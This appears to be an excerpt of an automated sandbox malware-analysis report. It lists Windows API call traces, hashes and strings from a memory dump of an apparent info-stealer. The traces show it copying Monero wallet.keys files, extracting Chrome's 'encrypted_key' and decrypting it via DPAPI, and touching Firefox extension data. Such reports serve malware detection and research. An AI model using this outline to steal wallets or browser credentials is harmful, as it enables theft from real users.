                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CB8B60: GetSystemTime.KERNEL32(00CC0E1A,009DE528,00CC05AE,?,?,00CA13F9,?,0000001A,00CC0E1A,00000000,?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CB8B86
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CAA2E1
                                        • lstrlen.KERNEL32(00000000,00000000), ref: 00CAA3FF
                                        • lstrlen.KERNEL32(00000000), ref: 00CAA6BC
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                        • DeleteFileA.KERNEL32(00000000), ref: 00CAA743
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 57f59a24e268b232bfc83931f445c82c4d243626e46a22ce6dd125c5acccbce4
                                        • Instruction ID: 1f11030b30b3056ea150c36ffdde954effadf31da93507e048f4a14e9fc64b23
                                        • Opcode Fuzzy Hash: 57f59a24e268b232bfc83931f445c82c4d243626e46a22ce6dd125c5acccbce4
                                        • Instruction Fuzzy Hash: E2E1EA72C10118AADB14FBA4DCA2EEE733CAF14300F548169F556B6491EF316A4DEB62
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CB8B60: GetSystemTime.KERNEL32(00CC0E1A,009DE528,00CC05AE,?,?,00CA13F9,?,0000001A,00CC0E1A,00000000,?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CB8B86
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CAD481
                                        • lstrlen.KERNEL32(00000000), ref: 00CAD698
                                        • lstrlen.KERNEL32(00000000), ref: 00CAD6AC
                                        • DeleteFileA.KERNEL32(00000000), ref: 00CAD72B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: f1ef11923d715a6881690ca7c383165e44014e9deb3f56bb140369df9eb50473
                                        • Instruction ID: 4d9e8ed6df465824ea9b4cb6f035f0f8f07aacff65e3fdf6a01693ac6f04e8f5
                                        • Opcode Fuzzy Hash: f1ef11923d715a6881690ca7c383165e44014e9deb3f56bb140369df9eb50473
                                        • Instruction Fuzzy Hash: 99912F72C10108ABDB18FBA1DCA2EEE733CAF14300F544169F557B6491EF356A09EB62
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CB8B60: GetSystemTime.KERNEL32(00CC0E1A,009DE528,00CC05AE,?,?,00CA13F9,?,0000001A,00CC0E1A,00000000,?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CB8B86
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CAD801
                                        • lstrlen.KERNEL32(00000000), ref: 00CAD99F
                                        • lstrlen.KERNEL32(00000000), ref: 00CAD9B3
                                        • DeleteFileA.KERNEL32(00000000), ref: 00CADA32
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 55467dfeed8bef8e45756bfeab74f2c6c4a958177ff725f02629c906da067c78
                                        • Instruction ID: b9e3d538760dd27b5d1ca01e6d1c024cdc32ec9c98aeb333b1c633940faf2a32
                                        • Opcode Fuzzy Hash: 55467dfeed8bef8e45756bfeab74f2c6c4a958177ff725f02629c906da067c78
                                        • Instruction Fuzzy Hash: 38813172810108ABDB14FBA1DCA2EEE733CAF14300F544128F587B6491EF356A09EB62
                                        APIs
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CA99EC
                                          • Part of subcall function 00CA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CA9A11
                                          • Part of subcall function 00CA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CA9A31
                                          • Part of subcall function 00CA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CA148F,00000000), ref: 00CA9A5A
                                          • Part of subcall function 00CA99C0: LocalFree.KERNEL32(00CA148F), ref: 00CA9A90
                                          • Part of subcall function 00CA99C0: CloseHandle.KERNEL32(000000FF), ref: 00CA9A9A
                                          • Part of subcall function 00CB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CB8E52
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00CC1580,00CC0D92), ref: 00CAF54C
                                        • lstrlen.KERNEL32(00000000), ref: 00CAF56B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                        • API String ID: 998311485-3310892237
                                        • Opcode ID: a0043e70105e64d629e799f3b004f8ea29523ec8e89d2228fdb68a1d55d0074a
                                        • Instruction ID: d2a52c0d35717cdbc48c8605b9998bba89f2228b4e27d08ea37752a6800ba75a
                                        • Opcode Fuzzy Hash: a0043e70105e64d629e799f3b004f8ea29523ec8e89d2228fdb68a1d55d0074a
                                        • Instruction Fuzzy Hash: CE511071D10108BADB14FBF4DC96EED737CAF54300F408528F856A7591EE346A09EBA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID:
                                        • API String ID: 367037083-0
                                        • Opcode ID: 3bb17ce67bd11dc7e920c519e2729c63963e5d9df29ab6b5278cddc6eacccaf0
                                        • Instruction ID: 866b8570f3c415db31dbebf325be0d44daa3fc8be9c35913c0f16012cf48b05f
                                        • Opcode Fuzzy Hash: 3bb17ce67bd11dc7e920c519e2729c63963e5d9df29ab6b5278cddc6eacccaf0
                                        • Instruction Fuzzy Hash: 65414E75D10149EFCB08EFA5D895AEEB778BB44304F108028F41677290DB35AA09DFA1
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CA99EC
                                          • Part of subcall function 00CA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CA9A11
                                          • Part of subcall function 00CA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CA9A31
                                          • Part of subcall function 00CA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CA148F,00000000), ref: 00CA9A5A
                                          • Part of subcall function 00CA99C0: LocalFree.KERNEL32(00CA148F), ref: 00CA9A90
                                          • Part of subcall function 00CA99C0: CloseHandle.KERNEL32(000000FF), ref: 00CA9A9A
                                          • Part of subcall function 00CB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CB8E52
                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00CA9D39
                                          • Part of subcall function 00CA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CA4EEE,00000000,00000000), ref: 00CA9AEF
                                          • Part of subcall function 00CA9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00CA4EEE,00000000,?), ref: 00CA9B01
                                          • Part of subcall function 00CA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CA4EEE,00000000,00000000), ref: 00CA9B2A
                                          • Part of subcall function 00CA9AC0: LocalFree.KERNEL32(?,?,?,?,00CA4EEE,00000000,?), ref: 00CA9B3F
                                          • Part of subcall function 00CA9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00CA9B84
                                          • Part of subcall function 00CA9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00CA9BA3
                                          • Part of subcall function 00CA9B60: LocalFree.KERNEL32(?), ref: 00CA9BD3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                        • String ID: $"encrypted_key":"$DPAPI
                                        • API String ID: 2100535398-738592651
                                        • Opcode ID: 47283674950cd9ed5d6a4449e1be8038ac6ef5aaaf68b852fd8bc59659d301df
                                        • Instruction ID: 050bff027e449aa64af7945bf49d8269845a55982c3dd3118cebb0657d7cd4ed
                                        • Opcode Fuzzy Hash: 47283674950cd9ed5d6a4449e1be8038ac6ef5aaaf68b852fd8bc59659d301df
                                        • Instruction Fuzzy Hash: A73110B5D1010AABCB14DFE4DC86EEFB7B8EB49308F144519E915A7241EB309A44CBA1
                                        APIs
                                        • CreateFileA.KERNEL32(00CB3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00CB3AEE,?), ref: 00CB92FC
                                        • GetFileSizeEx.KERNEL32(000000FF,00CB3AEE), ref: 00CB9319
                                        • CloseHandle.KERNEL32(000000FF), ref: 00CB9327
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSize
                                        • String ID:
                                        • API String ID: 1378416451-0
                                        • Opcode ID: 87c2759d09b30de22dcb1761227eb4f1eacee6f412c4dc660a9aed157a75f541
                                        • Instruction ID: 8d0e28ee762e2ff41bb3aaef34cbb0da296d450f24d2ab3f8e70ba06770e5970
                                        • Opcode Fuzzy Hash: 87c2759d09b30de22dcb1761227eb4f1eacee6f412c4dc660a9aed157a75f541
                                        • Instruction Fuzzy Hash: 59F03C75E44208BBDB10DBF2DC49B9E77F9EB48710F10C268B651AB2D0D6B0A7058B50
                                        APIs
                                        • __getptd.LIBCMT ref: 00CBC74E
                                          • Part of subcall function 00CBBF9F: __amsg_exit.LIBCMT ref: 00CBBFAF
                                        • __getptd.LIBCMT ref: 00CBC765
                                        • __amsg_exit.LIBCMT ref: 00CBC773
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00CBC797
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 300741435-0
                                        • Opcode ID: b32c21abc21ee87435effb79711e53bdf7619522bb2e336913485776ba48a8da
                                        • Instruction ID: cc657267a2e172fde3f9f1f41e80abcf1a5fce676bdee71fb84fbea33becb490
                                        • Opcode Fuzzy Hash: b32c21abc21ee87435effb79711e53bdf7619522bb2e336913485776ba48a8da
                                        • Instruction Fuzzy Hash: 7FF0BE329007009BDB21BBF89887BEE33A0AF04721F244149F464B61D2CFA45E40BE96
                                        APIs
                                          • Part of subcall function 00CB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CB8E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB4F7A
                                        • lstrcat.KERNEL32(?,00CC1070), ref: 00CB4F97
                                        • lstrcat.KERNEL32(?,009D8AA8), ref: 00CB4FAB
                                        • lstrcat.KERNEL32(?,00CC1074), ref: 00CB4FBD
                                          • Part of subcall function 00CB4910: wsprintfA.USER32 ref: 00CB492C
                                          • Part of subcall function 00CB4910: FindFirstFileA.KERNEL32(?,?), ref: 00CB4943
                                          • Part of subcall function 00CB4910: StrCmpCA.SHLWAPI(?,00CC0FDC), ref: 00CB4971
                                          • Part of subcall function 00CB4910: StrCmpCA.SHLWAPI(?,00CC0FE0), ref: 00CB4987
                                          • Part of subcall function 00CB4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00CB4B7D
                                          • Part of subcall function 00CB4910: FindClose.KERNEL32(000000FF), ref: 00CB4B92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                        • String ID:
                                        • API String ID: 2667927680-0
                                        • Opcode ID: 481e201c14f0cd3fb7995d8ce1506227d2f48c71083194501e0a4ff7421a1c70
                                        • Instruction ID: 5780386f0087d4b7ad358bba6dc61c76c84d4197c5fd055722b0e8f2c852522c
                                        • Opcode Fuzzy Hash: 481e201c14f0cd3fb7995d8ce1506227d2f48c71083194501e0a4ff7421a1c70
                                        • Instruction Fuzzy Hash: 7921887AD0020CABC754FBB0DC86EE9337CA754700F04456CB659A6181EE75AACCDBA2